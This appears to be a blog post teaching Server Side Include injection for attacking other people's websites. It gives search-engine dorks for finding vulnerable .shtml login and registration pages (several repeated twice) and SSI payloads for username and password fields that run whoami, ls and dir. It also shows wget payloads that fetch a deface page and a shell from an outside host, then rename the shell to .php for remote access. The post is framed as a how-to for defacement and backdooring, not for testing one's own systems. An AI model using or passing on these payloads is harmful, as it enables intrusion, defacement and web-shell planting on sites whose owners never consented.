Server Side Include is a web application exploit which give grant us access to upload files remotely to vuln. sites. File uploading is multi-extension exception is .php,you cannot execute your shell in .php form
- First step is finding vulnerable site by GOOGLE/BING DORKS:-
inurl:bin/Cklb/
inurl:login.shtml
inurl:login.shtm
inurl:login.stm
inurl:search.shtml
inurl:search.shtm
inurl:search.stm
inurl:forgot.shtml
inurl:forgot.shtm
inurl:forgot.stm
inurl:register.shtml
inurl:register.shtm
inurl:register.stm
inurl:login.shtml?page=
inurl:login.shtml
inurl:login.shtm
inurl:login.stm
inurl:search.shtml
inurl:search.shtm
inurl:search.stm
inurl:forgot.shtml
inurl:forgot.shtm
inurl:forgot.stm
inurl:register.shtml
inurl:register.shtm
inurl:register.stm
inurl:login.shtml?page=
If the Dorks doesn't work then find the sites manually by the following commands codes :-
- Manual Injection:- Put the following codes in field of USERNAME & PASSWORD
- <!--#echo var="DATE_LOCAL" --> IT WILL SHOW DATE
- <!--#exec cmd="whoami"--> IT WILL SHOW RUNNING USER ON THE SERVER
- <pre><!--#exec cmd="ls -a" --></pre><!--#exec cmd="ls -a" --></pre> IN LINUX ONLY
IT WILL SHOW DIRECTORY FILES - <!-- #exec cmd="dir" --> WINDOWS ONLY, DISPLAY DIRECTORY FILES
- After finding a vulnerable loop in site it's time to upload your deface page or shell.
- First find a host provider where you can upload your deface like best one is pastehtml.com
- Now enter the following code in USERNAME AND PASSWORD
<!--#exec cmd="wget http://website.com/deface.html" --> - Then by this code your deface will be be upload to view your deface page go to the http://website.com/deface.html
How to Upload shell in the site-
- First Host your shell in .txt format on any site..
- Then Enter the following code in login page<!--#exec cmd="wget http://website.com/shell.txt" -->
- Check either your shell.txt is uploaded or not by this code
<pre><!--#exec cmd="ls -a" --></pre><!--#exec cmd="ls -a" --></pre> - In File Extension change your shell.txt to shell.php by the help of this command
<!--#exec cmd="mv abc.txt abc.php" --> - Now you can access your shell by this link site.com/shell.php
No comments:
Post a Comment